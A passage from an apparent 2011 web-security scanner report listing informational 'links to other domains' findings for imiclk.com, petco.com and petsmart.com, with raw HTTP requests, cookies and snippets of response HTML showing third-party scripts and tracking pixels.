Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro; CH=24785,53c1h,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c1h,33114,00000,18653,53bro,24782,53c1h,32619,00000,32620,00000; RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:59:51 GMT
Connection: close
Set-Cookie: CH=18654,53c7L,18661,53c7L,28363,53br0,22244,53br0,24785,53c1h,24783,53c1h,18653,53c7L,33114,00000,24782,53c1h,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:01:26 GMT
Set-Cookie: RQ=985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c7L,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:01:26 GMT
Content-Length: 224

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://pixel.mathtag.com/data/img?mt_id=100040&amp;mt_dcid=1305511191" alt="" border="0" width="1" height="1"></body>
...[SNIP]...

17.46. http://www.imiclk.com/cgi/r.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro; CH=24785,53c1h,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c1h,33114,00000,18653,53bro,24782,53c1h,32619,00000,32620,00000; RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:54:27 GMT
Connection: close
Set-Cookie: CH=18654,53bro,18661,53bro,28363,53br0,22244,53br0,24785,53c27,24783,53c27,18653,53bro,33114,00000,24782,53c27,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT
Set-Cookie: RQ=985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c27,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:05:18 GMT
Content-Length: 224

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://pixel.mathtag.com/data/img?mt_id=100040&amp;mt_dcid=1305510867" alt="" border="0" width="1" height="1"></body>
...[SNIP]...

17.47. http://www.imiclk.com/cgi/r.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imiclk.com
Path:   /cgi/r.cgi

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens HTTP/1.1
Host: www.imiclk.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OL8U=2-2-2615A602015883100AB3965ADAC58D262570467070CBBA4CE3908934A2129506-4331228C08AC1DCF1AA5BA626D0099EC942F38B08D6AB5ACFA20E1D9B133F1CC; YU=3619a40dde8a3ac4dfc0a3674599e768-53bro; CH=24785,53c1h,22244,53br0,28363,53br0,18661,53bro,18654,53bro,24783,53c1h,33114,00000,18653,53bro,24782,53c1h,32619,00000,32620,00000; RQ=1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Cache-Control: no-store
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:59:52 GMT
Connection: close
Set-Cookie: CH=18654,53bro,18661,53bro,28363,53br0,22244,53br0,24785,53c7M,24783,53c7M,18653,53bro,33114,00000,24782,53c7M,32619,00000,32620,00000; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:09:49 GMT
Set-Cookie: RQ=985,53bro,1445,53bro,1470,53c1h,1478,53bro,1513,53bro,1514,53bro,1515,53bro,2398,53bro,2570,53c1h,3173,53c1h,3190,53c1h,3238,53bro,3677,53bro,3678,53c1h,3387,53br2,3388,53brH,3389,53brJ,3390,53c1h,3391,53c7M,1267,53br0,2831,53br0,2848,53br0,2849,53br0,2852,53br0,2850,53br0,2888,53br2,2890,53br0,2921,53br0,2887,53br0,3468,53br2; domain=.imiclk.com; path=/; expires=Tue, 15-May-2012 01:09:49 GMT
Content-Length: 224

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2//EN"><html><head><title></title></head><body>
<img src="http://pixel.mathtag.com/data/img?mt_id=100040&amp;mt_dcid=1305511192" alt="" border="0" width="1" height="1"></body>
...[SNIP]...

17.48. http://www.petco.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petco.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/default.aspx?aid=10413444&pid=2537521&cm_mmc=cj-_-cid-_-2537521-_-10413444
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: Compiled
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:57:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:56:15 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:56:15 PM; domain=.petco.com; expires=Sun, 14-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: Basket=AffiliateCJExpiryDate=6/19/2011 6:56:15 PM&PID=2537521&AID=10413444; domain=.petco.com; expires=Tue, 16-Aug-2011 01:56:15 GMT; path=/
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 97339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</style>


<script type="text/javascript" src="http://edge.liveclicker.net/scripts/jquery.liveclicker.v1-11_c.js"></script>
...[SNIP]...
<div id="util-social-icons">
<a class="util-tw" href="http://twitter.com/PETCO" target="_blank">Twitter</a>
<a class="util-fb" href="http://www.facebook.com/PETCO" target="_blank">Facebook</a>
...[SNIP]...
</a -->
<a class="util-bl" href="http://www.petcoscoop.com/" target="_blank">BLOG</a>
...[SNIP]...
</a>
<a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.petco.com" id="mcaffee-link"><img width="65" height="37" border="0" src="http://images.scanalert.com/meter/www.petco.com/31.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
<br />
<a href="http://petco.shoplocal.com/petco/default.aspx?action=nuep&amp;adref=footer">Local Ad</a>
...[SNIP]...
<div class="clearfix">
<a target="_blank" class="footer-social fb" href="http://www.facebook.com/PETCO">PETCO on Facebook</a>
<a target="_blank" class="footer-social tw footer-social-rgt" href="http://twitter.com/PETCO">Twitter</a>
...[SNIP]...
</a> ### -->
<a target="_blank" class="footer-social fbg" href="http://www.facebook.com/GenNaturalPet">Generation Natural Pet</a>
...[SNIP]...
</p>
<a href="http://petco.shoplocal.com/petco/new_user_entry.aspx?adref=hp" manual_cm_re="LocalAd-_-Offline-_-Button">See What's On Sale</a>
...[SNIP]...
<noscript><iframe src="http://view.atdmt.com/iaction/iwcpet_Homepage_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0"
marginwidth="0" topmargin="0" leftmargin="0">
</iframe>
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a target="_blank" href="https://www.bizrate.com/ratings_guide/cust_reviews__mid--29914.html">
<script>
...[SNIP]...

17.49. http://www.petco.com/Secure/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petco.com
Path:   /Secure/Login.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /Secure/Login.aspx?ReturnUrl=/Secure/YourAccount.aspx HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=256672559073194; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; SL_UVId=28F6BEFE806000C3; __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.2.10.1305510193; mt.v=1.1314269718.1305510194589; RES_SESSIONID=18709185067564; ResonanceSegment=2; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D2%3Bnsid%3D0%3Blut%3D1305510840147%3B; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D0%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D233%3Bgid%3Dc3089e6d97b75860d4a6aed45da60c42%3Bgdx%3D233%3Bpt%3D46830%3B; CoreAt=90002311=1|2|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; cmRS=&t1=1305510842039&t2=1305510887898&t3=1305511397575&t4=1305510840070&lti=1305511397570&ln=&hr=http%3A//www.petco.com/Secure/Login.aspx%3FReturnUrl%3D/Secure/YourAccount.aspx&fti=&fn=%3A0%3B%3A1%3B%3A2%3B%3A3%3B&ac=&fd=&uer=&fu=&pi=HOME%20PAGE&ho=customerappreciation.petco.com/cm%3F&ci=90002311

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/secure/login.aspx?returnurl=/secure/youraccount.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: TouchUp
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 02:13:19 GMT
Connection: close
Set-Cookie: SL_UVId=28F6BEFE806000C3;path=/;
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 43574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<div id="util-social-icons">
<a class="util-tw" href="http://twitter.com/PETCO" target="_blank">Twitter</a>
<a class="util-fb" href="http://www.facebook.com/PETCO" target="_blank">Facebook</a>
...[SNIP]...
</a -->
<a class="util-bl" href="http://www.petcoscoop.com/" target="_blank">BLOG</a>
...[SNIP]...
</a>
<a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.petco.com" id="mcaffee-link"><img width="65" height="37" border="0" src="http://images.scanalert.com/meter/www.petco.com/31.gif" alt="HACKER SAFE certified sites prevent over 99.9% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;"></a>
...[SNIP]...
<br />
<a href="http://petco.shoplocal.com/petco/default.aspx?action=nuep&amp;adref=footer">Local Ad</a>
...[SNIP]...
<div class="clearfix">
<a target="_blank" class="footer-social fb" href="http://www.facebook.com/PETCO">PETCO on Facebook</a>
<a target="_blank" class="footer-social tw footer-social-rgt" href="http://twitter.com/PETCO">Twitter</a>
...[SNIP]...
</a> ### -->
<a target="_blank" class="footer-social fbg" href="http://www.facebook.com/GenNaturalPet">Generation Natural Pet</a>
...[SNIP]...
<!-- BEGIN: BizRate Medal (125x73 pixels) -->
<a target="_blank" href="https://www.bizrate.com/ratings_guide/cust_reviews__mid--29914.html">
<script>
...[SNIP]...

17.50. http://www.petsmart.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /?rdir=1A HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542861802%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//www.petsmart.com/_1___1305541061807%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:17:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview T
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://pet.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<!-- Do not edit/add js scripts here. Use the min-cat project. Config file: /ant-min-cat/site-head-js.xml -->
<script src="http://pet.imageg.net/min-cat/site-head-js.xml.min.js" type="text/javascript"></script>
...[SNIP]...
<!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-head-css.xml -->
<link href="http://pet.imageg.net/min-cat/site-head-css.xml.min.css" type="text/css" rel="stylesheet" />
<!-- end min-cat section -->
...[SNIP]...
<!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-home-css.xml -->
<link href="http://pet.imageg.net/min-cat/site-home-css.xml.min.css" type="text/css" rel="stylesheet" />
<!-- end min-cat section -->
...[SNIP]...
<!-- Do not edit/add css links here. Use the min-cat project. Config file: /ant-min-cat/site-css.xml -->
<link href="http://pet.imageg.net/min-cat/site-css.xml.min.css" type="text/css" rel="stylesheet" />
<!-- end min-cat section -->
<link rel="SHORTCUT ICON" href="http://pet.imageg.net/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://pet.imageg.net/graphics/media/pet/global-assets/css/homepage_cmsTemplate.css" />


<link rel="canonical" href="http://www.petsmart.com" />
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://pet.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://pet.imageg.net/include/shoprunner/css/shoprunner.css" />


<script>
...[SNIP]...
<a title='PetSmart - Pet supplies and pet products for healthier, happier pets' href='/' onClick='javascript:location.href="/";return false;'><img class="pngfix" src="http://pet.imageg.net/graphics/media/pet/global-assets/images/header-logo.png" width="248" height="100" alt="PetSmart - Pet supplies and pet products for healthier, happier pets" border="0" /></a>
...[SNIP]...
<!-- Checking productPreviewAllowed -->


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...
<!-- Checking productPreviewAllowed -->


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...
<li id="mainnav-mypetsmart"><a href="http://www.mypetsmart.com/">myPetSmart</a>
...[SNIP]...
<li id="mainnav-shoplocal"><a href="http://petsmart.shoplocal.com/petsmart/new_user_entry.aspx?AdRef=ecirc" style="color:#A30000;">In-store Specials</a>
...[SNIP]...
<div style="padding-right: 20px; padding-left: 0px; float: right; padding-bottom: 0px; margin: 0px; padding-top: 0px"><a title="Join us on Facebook" href="http://www.facebook.com/petsmart"><img alt="Join us on Facebook" border="0" src="/cms_widgets/47/64/476401_assets/icon-facebook.gif"/></a> <a title="Follow us on Twitter" href="http://www.twitter.com/petsmart"><img alt="Follow us on Twitter" border="0" src="/cms_widgets/47/64/476401_assets/icon-twitter.gif"/>
...[SNIP]...
<!-- Checking productPreviewAllowed -->


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...
<div id="pet_headerInclude_2" style="width:980px;border:0px;overflow:hidden;">


<img border="0" name="cms_image27355762_10" src="http://pet.imageg.net/cms_widgets/47/63/476396_assets/pixel.jpg" height="1" width="1" align="Default" valign="Default" /></div>
...[SNIP]...
<div class="theme-quick-look-row"><a href="http://www.facebook.com/PetSmart?sk=app_182985495078918" title="Enter our Happiness In Store Contest - Learn more"><img src="/cms_widgets/47/61/476141_assets/hp-051211-ql-r2a.jpg" alt="Enter our Happiness In Store Contest - Learn more" border="0"/>
...[SNIP]...
<li><a href="http://www.twitter.com/petsmart" title="Follow us on Twitter" target="_blank"><img src="http://includes.petsmart.com/homepage/redesigned/images/logo-twitter.gif" alt="Follow us on Twitter" width="16" height="16" border="0"/></a> <a href="http://www.twitter.com/petsmart" title="Follow us on Twitter" target="_blank">Follow us on Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/petsmart/" title="Join us on Facebook" target="_blank"><img src="http://includes.petsmart.com/homepage/redesigned/images/logo-facebook.gif" alt="Join us on Facebook" width="16" height="16" border="0"/></a> <a href="http://www.facebook.com/petsmart/" title="Join us on Facebook" target="_blank">Join us on Facebook</a>
...[SNIP]...
<li><a href="http://www.mypetsmart.com" title="myPetSmart.com" target="_blank">myPetSmart.com</a>
...[SNIP]...
<li><a href="http://www.petsmartcharities.org" title="PetSmart Charities">PetSmart Charities</a>
...[SNIP]...
<li><a href="http://www.petsmartcharities.org" title="PetSmart Charities">PetSmart Charities</a>
...[SNIP]...
<li class="first"><a title="About Us" shape="rect" href="http://phx.corporate-ir.net/phoenix.zhtml?c=93506&amp;p=irol-homeprofile">About Us</a>
...[SNIP]...
<li><a href="http://petsmart.versaic.com" title="Event Sponsorship">Event Sponsorship</a>
...[SNIP]...
<li><a title="PetSmart Charities" target="_blank" shape="rect" href="http://www.petsmartcharities.org">Charities</a>
...[SNIP]...
<map id="map" name="CharitySPOTMAP"><area coords="5,5,170,83" shape="rect" href="http://www.petsmartcharities.org/"/></map>
...[SNIP]...
<br /><a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.petsmart.com"><img src='https://images.scanalert.com/meter/www.petsmart.com/31.gif' alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...
<!-- Referral & Traffic Tracking -->

<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://link.mercent.com/image.ashx?merchantID=PETsMART" style="display: none;">
</noscript>
...[SNIP]...
<noscript>
       <iframe src="http://fls.doubleclick.net/activityi;src=1174584;type=fy10p031;cat=petsm990;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<!-- Mediaforge Pixel --->
<iframe width="0" scrolling="no" height="0" frameborder="0" src="http://tags.mediaforge.com/if/50"></iframe>
...[SNIP]...
<!-- // End of code of PMO 52759 -->


   <script type="text/javascript" defer="defer" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx"></script>
...[SNIP]...

17.51. https://www.petsmart.com/checkout/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /checkout/index.jsp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
